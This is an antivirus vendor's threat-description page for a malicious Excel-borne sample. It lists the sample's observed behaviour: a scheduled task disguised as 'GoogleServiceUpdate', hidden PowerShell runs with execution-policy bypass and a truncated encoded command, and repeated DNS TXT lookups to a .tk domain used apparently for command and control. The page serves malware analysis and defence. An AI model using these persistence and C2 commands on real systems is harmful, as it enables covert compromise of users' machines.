Meine Bibliothek
Meine Bibliothek

+ Zur Bibliothek hinzufügen

Support

Ihre Anfragen

Rufen Sie uns an

+7 (495) 789-45-86

Profil

Exploit.Siggen3.34204

Added to the Dr.Web virus database: 2022-06-21

Virus description added:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • <SYSTEM32>\tasks\googleserviceupdate
Malicious functions
Executes the following (exploit)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -Enc JABwAGEAdABoAD0AIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABhAHAAcABkAGEAdABhAFwAbABvAGMAYQBsAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACIADQAKAA0ACgBpAGYAKAAtAG4...
Modifies file system
Creates the following files
  • %TEMP%\u1848931.tmp
  • <Current directory>\14d11000
  • %LOCALAPPDATA%\microsoft\windows\l69742.vbs
  • %LOCALAPPDATA%\microsoft\windows\mc.ps1
Substitutes the following files
  • <PATH_SAMPLE>.xls
Network activity
UDP
  • DNS ASK rn#######_783021678.yjksdrl.tk
  • DNS ASK rn#######_997787760.yjksdrl.tk
  • DNS ASK rn#######_1387306851.yjksdrl.tk
  • DNS ASK rn#######_1236890116.yjksdrl.tk
  • DNS ASK rn#######_314431924.yjksdrl.tk
  • DNS ASK rn#######_1460602812.yjksdrl.tk
  • DNS ASK rn#######_699619129.yjksdrl.tk
  • DNS ASK rn#######_922355888.yjksdrl.tk
  • DNS ASK rn#######_1265606617.yjksdrl.tk
  • DNS ASK rn#######_162712858.yjksdrl.tk
  • DNS ASK rn#######_1431092406.yjksdrl.tk
  • DNS ASK rn#######_788035289.yjksdrl.tk
  • DNS ASK rn#######_157938503.yjksdrl.tk
  • DNS ASK rn#######_643468000.yjksdrl.tk
  • DNS ASK rn#######_1944017322.yjksdrl.tk
  • DNS ASK rn#######_1088080454.yjksdrl.tk
  • DNS ASK rn#######_1532856275.yjksdrl.tk
  • DNS ASK rn#######_71567605.yjksdrl.tk
  • DNS ASK rn#######_189213581.yjksdrl.tk
  • DNS ASK rn#######_641616159.yjksdrl.tk
  • DNS ASK rn#######_626201066.yjksdrl.tk
  • DNS ASK rn#######_191846047.yjksdrl.tk
  • DNS ASK rn#######_1293794580.yjksdrl.tk
  • DNS ASK rn#######_687555973.yjksdrl.tk
  • DNS ASK rn#######_799286546.yjksdrl.tk
  • DNS ASK rn#######_1003903637.yjksdrl.tk
  • DNS ASK rn#######_1153370186.yjksdrl.tk
  • DNS ASK rn#######_1021119231.yjksdrl.tk
  • DNS ASK rn#######_1035023105.yjksdrl.tk
  • DNS ASK rn#######_1359577787.yjksdrl.tk
  • DNS ASK rn#######_1847577543.yjksdrl.tk
  • DNS ASK rn#######_1259832975.yjksdrl.tk
  • DNS ASK rn#######_1163838114.yjksdrl.tk
  • DNS ASK rn#######_203780776.yjksdrl.tk
  • DNS ASK rn#######_1432278158.yjksdrl.tk
  • DNS ASK rn#######_1571285470.yjksdrl.tk
  • DNS ASK rn#######_1507299626.yjksdrl.tk
  • DNS ASK rn#######_1642853075.yjksdrl.tk
  • DNS ASK rn#######_1027666388.yjksdrl.tk
  • DNS ASK rn#######_1979028725.yjksdrl.tk
  • DNS ASK rn#######_1734878268.yjksdrl.tk
  • DNS ASK rn#######_668345610.yjksdrl.tk
  • DNS ASK rn#######_171045087.yjksdrl.tk
  • DNS ASK rn#######_1177678230.yjksdrl.tk
  • DNS ASK rn#######_391491618.yjksdrl.tk
  • DNS ASK rn#######_277395317.yjksdrl.tk
  • DNS ASK rn#######_176413000.yjksdrl.tk
  • DNS ASK rn#######_398000396.yjksdrl.tk
  • DNS ASK rn#######_1569597828.yjksdrl.tk
  • DNS ASK rn#######_1119171801.yjksdrl.tk
  • DNS ASK rn#######_328122479.yjksdrl.tk
  • DNS ASK rn#######_489564259.yjksdrl.tk
  • DNS ASK rn#######_1510460938.yjksdrl.tk
  • DNS ASK rn#######_1352827659.yjksdrl.tk
  • DNS ASK rn#######_1994528760.yjksdrl.tk
  • DNS ASK rn#######_1543032220.yjksdrl.tk
  • DNS ASK rn#######_1522034677.yjksdrl.tk
  • DNS ASK rn#######_1630972761.yjksdrl.tk
  • DNS ASK rn#######_1739688719.yjksdrl.tk
  • DNS ASK rn#######_1483677720.yjksdrl.tk
  • DNS ASK rn#######_892022689.yjksdrl.tk
  • DNS ASK rn#######_386050229.yjksdrl.tk
  • DNS ASK rn#######_1302777416.yjksdrl.tk
  • DNS ASK rn#######_210020041.yjksdrl.tk
  • DNS ASK rn#######_1419077905.yjksdrl.tk
  • DNS ASK rn#######_1215773151.yjksdrl.tk
  • DNS ASK rn#######_1766667211.yjksdrl.tk
  • DNS ASK rn#######_704005480.yjksdrl.tk
  • DNS ASK rn#######_808637786.yjksdrl.tk
  • DNS ASK rn#######_1504728391.yjksdrl.tk
  • DNS ASK rn#######_173774593.yjksdrl.tk
Miscellaneous
Creates and executes the following
  • '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -exec bypass -file %LOCALAPPDATA%\microsoft\Windows\mc.ps1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -Enc JABwAGEAdABoAD0AIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABhAHAAcABkAGEAdABhAFwAbABvAGMAYQBsAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACIADQAKAA0ACgBpAGYAKAAtAG4...' (with hidden window)
  • '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -exec bypass -file %LOCALAPPDATA%\microsoft\Windows\mc.ps1' (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /F /sc minute /mo 2 /tn "GoogleServiceUpdate" /tr "\"%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"\" "
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_687555973.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_799286546.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1153370186.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1532856275.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1021119231.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1035023105.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1359577787.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1847577543.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1259832975.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1163838114.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_189213581.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1432278158.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_203780776.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_922355888.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_997787760.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1387306851.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1236890116.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_314431924.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1460602812.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1265606617.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_699619129.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1293794580.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_191846047.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1318253901.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_708616873.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_741900959.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_96370869.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1802616220.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_988345492.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_49858126.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1657884559.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_153471288.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1603954353.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1630972761.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1420396721.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_20602497.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1836590257.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_863831626.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1708194716.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_173774593.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_71567605.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_641616159.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_626201066.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1088080454.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_162712858.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1431092406.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1177678230.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1642853075.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1027666388.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1979028725.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1734878268.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_668345610.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_171045087.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_391491618.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_489564259.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_277395317.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_176413000.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_398000396.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1569597828.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1119171801.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_328122479.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_783021678.yjksdrl.tk
  • '<SYSTEM32>\taskeng.exe' {EEC0EBAC-067D-4C90-A147-8E5885291EB9} S-1-5-21-1960123792-2022915161-3775307078-1001:ziqksfjn\user:Interactive:[1]
  • '<SYSTEM32>\schtasks.exe' /create /F /sc minute /mo 2 /tn "GoogleServiceUpdate" /tr "\"%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"\"
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1507299626.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1994528760.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1504728391.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_808637786.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_788035289.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_704005480.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_157938503.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_643468000.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1944017322.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1003903637.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1571285470.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_386050229.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1352827659.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1543032220.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_127692697.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_110754062.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1739688719.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1483677720.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_892022689.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1302777416.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1510460938.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_210020041.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1419077905.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1215773151.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1766667211.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1522034677.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_80251_1163614078.yjksdrl.tk

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android